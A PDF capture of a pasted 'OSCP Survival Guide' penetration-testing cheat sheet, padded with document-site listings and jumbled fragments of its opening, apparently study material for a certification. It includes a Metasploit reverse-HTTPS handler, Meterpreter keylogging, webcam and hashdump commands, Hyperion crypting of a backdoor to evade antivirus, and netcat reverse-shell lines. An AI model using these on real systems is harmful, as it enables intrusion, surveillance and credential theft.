2489. - Metasploit Exploit Multi Handler

2490.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2491. - multi/handler to accept an incoming reverse\_https\_meterpreter
2492.
2493. `payload

2494. use exploit/multi/handler

2495. set PAYLOAD windows/meterpreter/reverse_https
2496. set LHOST $ip

2497. set LPORT 443

2498. exploit
2499. [*] Started HTTPS reverse handler on https://$ip:443/`
2500.

2501. - Building Your Own MSF Module

2502.
2503. - `mkdir -p ~/.msf4/modules/exploits/linux/misc

2504. cd ~/.msf4/modules/exploits/linux/misc
2505. cp
2506. /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb

2507. ./crossfire.rb
2508. nano crossfire.rb`
2509.
2510. - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)

2511.
2512. - `download` Download a file or directory
2513. `upload` Upload a file or directory

2514. `portfwd` Forward a local port to a remote service

2515. `route` View and modify the routing table
2516. `keyscan_start` Start capturing keystrokes
2517. `keyscan_stop` Stop capturing keystrokes

2518. `screenshot` Grab a screenshot of the interactive desktop

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2519. `record_mic` Record audio from the default microphone for X seconds
2520. `webcam_snap` Take a snapshot from the specified webcam

2521. `getsystem` Attempt to elevate your privilege to that of local system.

2522. `hashdump` Dumps the contents of the SAM database
2523.

2524. - Meterpreter Post Exploitation Features

2525.
2526. - Create a Meterpreter background session
2527.

2528. `background`
2529.
2530. Bypassing Antivirus Software

2531. ===========================================================================================================================
2532.
2533. - Crypting Known Malware with Software Protectors

2534.
2535. - One such open source crypter, called Hyperion
2536.
2537. `cp /usr/share/windows-binaries/Hyperion-1.0.zip

2538. unzip Hyperion-1.0.zip

2539. cd Hyperion-1.0/
2540. i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe

2541. cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
2542. cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
2543. wine hyperion.exe ../backdoor.exe ../crypted.exe`
2544.

2545.
2546. OSCP Course Review

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2547. ================================================================================================================

2548.
2549. - Offensive Security’s PWB and OSCP — My Experience
2550. [*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)

2551.
2552. - OSCP Journey
2553. [*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
2554.

2555. - Down with OSCP

2556. [*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
2557.

2558. - Jolly Frogs - Tech Exams (Very thorough)

2559.
2560. [*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*]
(http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)

2561.
2562. OSCP Inspired VMs and Walkthroughs
2563. ================================================================================================================================

2564.
2565. - [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2566. [*https://www.root-me.org/*](https://www.root-me.org/)

2567.
2568. - Walk through of Tr0ll-1 - Inspired by on the Trolling found in the
2569. OSCP exam
2570. [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)

2571. Another walk through for Tr0ll-1

2572. [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*]
(https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2573. Taming the troll - walkthrough
2574. [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
2575. Troll download on Vuln Hub

2576. [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
2577.
2578. - Sickos - Walkthrough:
2579. [*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)

2580. Sickos - Inspired by Labs in OSCP

2581. [*https://www.vulnhub.com/series/*](https://www.vulnhub.com/series/sickos,70/)[sickos](https://www.vulnhub.com/series/sickos,70/)
[*,70/*](https://www.vulnhub.com/series/sickos,70/)

2582.
2583. - Lord of the Root Walk Through
2584. [*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
2585. Lord Of The Root: 1.0.1 - Inspired by OSCP

2586. [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
2587.
2588. - Tr0ll-2 Walk Through

2589. [*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*]
(https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
2590. Tr0ll-2

2591. [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
2592.
2593. Cheat Sheets
2594. ==========================================================================================================

2595.
2596. - Penetration Tools Cheat Sheet
2597. [*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-

sheet/)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2598.
2599. - Pen Testing Bookmarks
2600. [*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-

bookmarks/blob/master/BookmarksList.md)
2601.
2602. - OSCP Cheatsheets

2603. [*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
2604.
2605. - CEH Cheatsheet

2606. [*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*]
(https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
2607.
2608. - Net Bios Scan Cheat Sheet

2609. [*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
2610.
2611. - Reverse Shell Cheat Sheet

2612. [*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
2613.
2614. - NMap Cheat Sheet
2615. [*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)

2616.
2617. - Linux Commands Cheat Sheet
2618. [*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)

2619.
2620. - Security Hardening CentO 7
2621. [*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)

2622.
2623. - MetaSploit Cheatsheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2624. [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-
resources/sec560/misc_tools_sheet_v1.pdf)

2625.
2626. - Google Hacking Database:
2627. [*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)

2628.
2629. - Windows Assembly Language Mega Primer
2630. [*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)

2631.
2632. - Linux Assembly Language Mega Primer
2633. [*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
2634.

2635. - Metasploit Cheat Sheet

2636. [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-
resources/sec560/misc_tools_sheet_v1.pdf)

2637.
2638. - A bit dated but most is still relevant
2639.
2640. [*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-

related-notes.html)
2641.
2642. - NetCat

2643.
2644. - [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-
resources/sec560/netcat_cheat_sheet_v1.pdf)

2645.
2646. - [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*]
(http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2647.

2648. - [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*]
(http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
2649.

2650. - [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*]
(http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
2651.
2652. - [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-

resources/sec560/misc_tools_sheet_v1.pdf)
2653.
2654. - [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*]

(http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
2655.
2656. - [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)

2657.
2658. Essentials
2659. ========================================================================================================
2660.

2661. - Exploit-db
2662. [*https://www.exploit-db.com/*](https://www.exploit-db.com/)
2663.

2664. - SecurityFocus - Vulnerability database

2665. [*http://www.securityfocus.com/*](http://www.securityfocus.com/)
2666.
2667. - Vuln Hub - Vulnerable by design

2668. [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2669.
2670. - Exploit Exercises

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2671. [*https://exploit-exercises.com/*](https://exploit-exercises.com/)
2672.
2673. - SecLists - collection of multiple types of lists used during

2674. security assessments. List types include usernames, passwords, URLs,

2675. sensitive data grep strings, fuzzing payloads
2676. [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
2677.

2678. - Security Tube

2679. [*http://www.securitytube.net/*](http://www.securitytube.net/)
2680.

2681. - Metasploit Unleashed - free course on how to use Metasploit

2682. [*https://www.offensive-security.com/metasploit-unleashed*](https://www.offensive-security.com/metasploit-unleashed/)*/*
2683.

2684. - 0Day Security Enumeration Guide

2685. [*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-
testing/enumeration.html)
2686.

2687. - Github IO Book - Pen Testing Methodology

2688. [*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
2689.

2690. Windows Privledge Escalation

2691. ========================================================================================================
2692.
2693. - Fuzzy Security

2694. [*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
2695.
2696. - accesschk.exe

2697. https://technet.microsoft.com/en-us/sysinternals/bb664922

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2698.
2699. - Windows Priv Escalation For Pen Testers

2700. https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
2701.
2702. - Elevating Privileges to Admin and Further
2703. https://hackmag.com/security/elevating-privileges-to-administrative-and-further/

2704.
2705. - Transfer files to windows machines
2706. https://blog.netspi.com/15-ways-to-download-a-file/

RAW Paste Data

# OSCP-Survival-Guide
<pre>
_____ _____ _____ ______ _____ _ _ _____ _ _
| _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |
| | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___
| | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
\ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
\___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
</pre>

create new paste / dealsnew! / syntax languages / archive / faq / tools / night mode / api / scraping api
privacy statement / cookies policy / terms of service / security disclosure / dmca / contact

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Dedicated Server Hosting by Steadfast

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

Implementing SSL VPN With Fortigate
No ratings yet
Implementing SSL VPN With Fortigate
122 pages
Geography Pyq 500
No ratings yet
Geography Pyq 500
29 pages
Computer Networks - A Top Down Approach: Notes (Chapters 1, 2, 3, 9)
No ratings yet
Computer Networks - A Top Down Approach: Notes (Chapters 1, 2, 3, 9)
69 pages
Mdindia E-Card Jyoti
No ratings yet
Mdindia E-Card Jyoti
1 page
Deoghar To Ranchi Mom
No ratings yet
Deoghar To Ranchi Mom
3 pages
3 - Protocols For IoT
No ratings yet
3 - Protocols For IoT
67 pages
25070200190594HDFC ChallanReceipt
No ratings yet
25070200190594HDFC ChallanReceipt
1 page
AdmitCard 253510169639
No ratings yet
AdmitCard 253510169639
2 pages
Penetration Testing Tools Cheat Sheet
No ratings yet
Penetration Testing Tools Cheat Sheet
85 pages
TCP Congestion Control Algorithms
No ratings yet
TCP Congestion Control Algorithms
10 pages
Networking and Linux
No ratings yet
Networking and Linux
5 pages
Spectrum Virtualize Copy Services V2
No ratings yet
Spectrum Virtualize Copy Services V2
63 pages
Reverse Shell Cheat Sheet
No ratings yet
Reverse Shell Cheat Sheet
13 pages
Ascent™ Control Module (ACM) : Technical Datasheet
100% (1)
Ascent™ Control Module (ACM) : Technical Datasheet
3 pages
Pentesting Cheatsheet
No ratings yet
Pentesting Cheatsheet
33 pages
INSTEON Developers Guide 20070816a
No ratings yet
INSTEON Developers Guide 20070816a
397 pages
The Cyber Plumber S Handbook The Definitive Guide To SSH Tunneling Port Redirection and Bending Traffic Like A Boss Brennon Thomas Instant Download
No ratings yet
The Cyber Plumber S Handbook The Definitive Guide To SSH Tunneling Port Redirection and Bending Traffic Like A Boss Brennon Thomas Instant Download
66 pages
INDEX
No ratings yet
INDEX
47 pages
Applications of Network
No ratings yet
Applications of Network
20 pages
Top 80 - Linux Commands
No ratings yet
Top 80 - Linux Commands
8 pages
Euro 2021
No ratings yet
Euro 2021
97 pages
Pentesting Cheatsheet2
No ratings yet
Pentesting Cheatsheet2
64 pages
NMAP - Note My Abstract Ports! - HACKLIDO
No ratings yet
NMAP - Note My Abstract Ports! - HACKLIDO
7 pages
Indoor Navigation System Using BLE and ESP32
No ratings yet
Indoor Navigation System Using BLE and ESP32
11 pages
CH 4
No ratings yet
CH 4
34 pages
Pentest Tips and Tricks #1
No ratings yet
Pentest Tips and Tricks #1
25 pages
Unit-3-The Data Link Layer (Edited)
No ratings yet
Unit-3-The Data Link Layer (Edited)
24 pages
LabManual 2
No ratings yet
LabManual 2
11 pages
Terminal
No ratings yet
Terminal
8 pages
Qual Net Tutorial
No ratings yet
Qual Net Tutorial
60 pages
OSCP Notes - Shells
No ratings yet
OSCP Notes - Shells
5 pages
Eitan Zahavi Isaac Keslassy Avinoam Kolodny
No ratings yet
Eitan Zahavi Isaac Keslassy Avinoam Kolodny
20 pages
All UNIX COMMANDS
100% (4)
All UNIX COMMANDS
658 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
33 pages
COS 318: Operating Systems Message Passing
No ratings yet
COS 318: Operating Systems Message Passing
20 pages
Pentest Tips and Tricks #2 - EK
No ratings yet
Pentest Tips and Tricks #2 - EK
16 pages
Chapter 7: Security Assessment, Analysis, and Assurance
No ratings yet
Chapter 7: Security Assessment, Analysis, and Assurance
36 pages
Dell SonicWALL SuperMassive Firewall Series Data Sheet NEM Technology
No ratings yet
Dell SonicWALL SuperMassive Firewall Series Data Sheet NEM Technology
12 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
10 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
12 pages
Protocol
No ratings yet
Protocol
19 pages
Matt Curtin March 1997 Reprinted With The Permission of Kent Information Services, Inc
No ratings yet
Matt Curtin March 1997 Reprinted With The Permission of Kent Information Services, Inc
16 pages
EcoStruxure Panel Server - PAS600L
No ratings yet
EcoStruxure Panel Server - PAS600L
3 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
14 pages
Chapter 4 - Gathering Information
No ratings yet
Chapter 4 - Gathering Information
38 pages
Awesome One-Liner Bug Bounty
No ratings yet
Awesome One-Liner Bug Bounty
14 pages
CLF ALL
No ratings yet
CLF ALL
464 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
7 pages
Myoscp Notes
No ratings yet
Myoscp Notes
12 pages
Cool Unix CLI
100% (1)
Cool Unix CLI
464 pages
Onliners by NurHabib
No ratings yet
Onliners by NurHabib
6 pages
Cramsession™ For Sun Solaris 8 Certified Network Administration
No ratings yet
Cramsession™ For Sun Solaris 8 Certified Network Administration
28 pages
FDSFSD
No ratings yet
FDSFSD
35 pages
Wreath - TRYHACKME
No ratings yet
Wreath - TRYHACKME
119 pages
Linux: Cut & Paste More Linux Commands
100% (1)
Linux: Cut & Paste More Linux Commands
16 pages
Cut & Paste More Linux Commands: Command Description
No ratings yet
Cut & Paste More Linux Commands: Command Description
30 pages
Commandlinefu All
100% (1)
Commandlinefu All
481 pages
More Linux Commands - A Practical Reference
No ratings yet
More Linux Commands - A Practical Reference
3 pages
Cheat Cheet Pentest
No ratings yet
Cheat Cheet Pentest
34 pages
Exfiltration Method For Channels
No ratings yet
Exfiltration Method For Channels
27 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
12 pages
Gnu Inetutils: Alain Magloire Et Al
No ratings yet
Gnu Inetutils: Alain Magloire Et Al
91 pages
Ethical Hacking
No ratings yet
Ethical Hacking
5 pages
CPH Version 1.2 20190220 PDF
No ratings yet
CPH Version 1.2 20190220 PDF
80 pages
Basic Unix Commands:: Command Example Description
No ratings yet
Basic Unix Commands:: Command Example Description
4 pages
Brennon Thomas - The Cyber Plumber's Handbook - The Definitive Guide To SSH Tunneling, Port Redirection, and Bending Traffic Like A Boss.-Opsdisk LLC (2019)
50% (2)
Brennon Thomas - The Cyber Plumber's Handbook - The Definitive Guide To SSH Tunneling, Port Redirection, and Bending Traffic Like A Boss.-Opsdisk LLC (2019)
80 pages
SolarWinds LEM Port and Firewall Requirements
No ratings yet
SolarWinds LEM Port and Firewall Requirements
4 pages
Comandos SMS - GPS PDF
No ratings yet
Comandos SMS - GPS PDF
3 pages
Cisco Cyberops Final Exam
No ratings yet
Cisco Cyberops Final Exam
44 pages
OSCP Day1
No ratings yet
OSCP Day1
44 pages
Anna University 7th Sem Syllabus
No ratings yet
Anna University 7th Sem Syllabus
5 pages
Challenge 3
No ratings yet
Challenge 3
11 pages
Malikashish8 Github Io Walkthrough Notes
No ratings yet
Malikashish8 Github Io Walkthrough Notes
19 pages
Linux Commands
No ratings yet
Linux Commands
9 pages
Linux Command Line Reference
No ratings yet
Linux Command Line Reference
10 pages
1K/2K/4K 5.0V CMOS Serial EEPROM: Features Package Type
No ratings yet
1K/2K/4K 5.0V CMOS Serial EEPROM: Features Package Type
8 pages
Zumaroc Notes v2
No ratings yet
Zumaroc Notes v2
36 pages
Chemistry
No ratings yet
Chemistry
8 pages
Linux CLI Cheat Sheet
No ratings yet
Linux CLI Cheat Sheet
6 pages
Linux Commands 1
No ratings yet
Linux Commands 1
8 pages
Seguridad Herramientas
No ratings yet
Seguridad Herramientas
5 pages
Penetration Testing Tools
No ratings yet
Penetration Testing Tools
16 pages
Pentesting Cheatsheet
100% (3)
Pentesting Cheatsheet
37 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
48 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
52 pages
1.basics of Kali - Tools Intro, Commands, Proxychains
100% (2)
1.basics of Kali - Tools Intro, Commands, Proxychains
17 pages
My CEHpractica Lcheat Sheet
No ratings yet
My CEHpractica Lcheat Sheet
6 pages
0day Security
No ratings yet
0day Security
30 pages
OSCP Preparation
No ratings yet
OSCP Preparation
1 page
Common Tools and Methods Used in Vulnhub CTF's
No ratings yet
Common Tools and Methods Used in Vulnhub CTF's
4 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
63 pages
RA57331-V-22R2 - LE04 - 5G Latency Optimization - Internal - Version
100% (2)
RA57331-V-22R2 - LE04 - 5G Latency Optimization - Internal - Version
51 pages
Evaluation of Some Intrusion Detection and Vulnerability Assessment Tools
From Everand
Evaluation of Some Intrusion Detection and Vulnerability Assessment Tools
Dr. Hedaya Mahmood Alasooly
No ratings yet
Evaluation of Some Windows and Linux Intrusion Detection Tools
From Everand
Evaluation of Some Windows and Linux Intrusion Detection Tools
Dr. Hedaya Alasooly
No ratings yet
CISCO PACKET TRACER LABS: Best practice of configuring or troubleshooting Network
From Everand
CISCO PACKET TRACER LABS: Best practice of configuring or troubleshooting Network
Mulayam Singh
No ratings yet

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.

OSCP Survival Guide

Uploaded by

OSCP Survival Guide

Uploaded by

OSCP-Survival-Guide

A GUEST NOV 22ND, 2017 8,387 NEVER

text 98.82 KB raw download report

4. | _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |

6. | | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \

19. ***UPDATE: October 2, 2017***

attempt. TRY HARDER!

27. ## Table of Contents

28. - [Kali Linux](#kali-linux)

29. - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)

31. * [Active Information Gathering](#active-information-gathering)

32. * [Port Scanning](#port-scanning)

34. * [HTTP Enumeration](#http-enumeration)

37. - [File Transfers](#file-transfers)

38. - [Privilege Escalation](#privilege-escalation)

39. * [Linux Privilege Escalation](#linux-privilege-escalation)

41. - [Client, Web and Password Attacks](#client-web-and-password-attacks)

42. * [Client Attacks](#client-attacks)

45. * [Database Vulnerabilities](#database-vulnerabilities)

48. - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)

50. - [Bypassing Antivirus Software](#bypassing-antivirus-software)

55. - Set the Target IP Address to the `$ip` system variable

58. - Find the location of a file

61. - Search through directories in the `$PATH` environment variable

66. `find / -name sbd\*`

68. - Show active internet connections

75. `netstat -antp |grep apache`

77. - Start a service

80. `systemctl start apache2`

82. - Have a service start at boot

85. - Stop a service

92. `tar -xzvf file.tar.gz`

95. `history | grep phrase_to_search_for`

98. `wget http://www.cisco.com`

100. - Open a webpage

103. - String manipulation

105. - Count number of lines in file

106. `wc index.html`

108. - Get the start or end of a file

109. `head index.html`

113. - Extract all the lines that contain a string

116. - Cut a string by a delimiter, filter results then sort

119. - Using Grep and regular expressions and output to a file

123. `for url in $(cat list.txt); do host $url; done`

131. - Decode Base64 Encoded Values

135. - Decode Hexidecimal Encoded Values

138. - Netcat - Read and write TCP and UDP Packets

144. `nc -nv $ip 110`

147. `nc -nlvp 4444`

150. `nc -nv $ip 4444`

152. - Send a file using netcat

156. `nc -nlvp 4444 > incoming.exe`

163. /bin/nc.traditional -e /bin/bash 1.2.3.4 4444

166. - Create a reverse shell with Ncat using cmd.exe on Windows

167. `nc.exe -nlvp 4444 -e cmd.exe`

173. - Create a reverse shell with Ncat using bash on Linux

174. `nc -nv $ip 4444 -e /bin/bash`

176. - Netcat for Banner Grabbing:

186. - Listen on port 4444 using ssl

192. `tcp.port eq 25 or icmp`

196. `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`

202. - Some commands are equal

204. `ip.addr == xxx.xxx.xxx.xxx`

208. `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `

218. - Display a pcap file

232. - Deny traffic to ports except for Local Loopback

238. - Clear ALL IPTables firewall rules

240. iptables -P INPUT ACCEPT

242. iptables -P OUTPUT ACCEPT

257. - Google search to find website sub domains

260. - Google filetype, and intitle

284. - Whois Enumeration

287. `whois $ip`

293. - `telnet $ip 25`

301. `cd /opt/recon-ng `

309. - Active Information Gathering

4. | _ / _/ \| _ \ / _| (_) | | | __ \ (_) | |

6. | | | |`--. \ | | / `--. \ | | | '\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \

19. UPDATE: October 2, 2017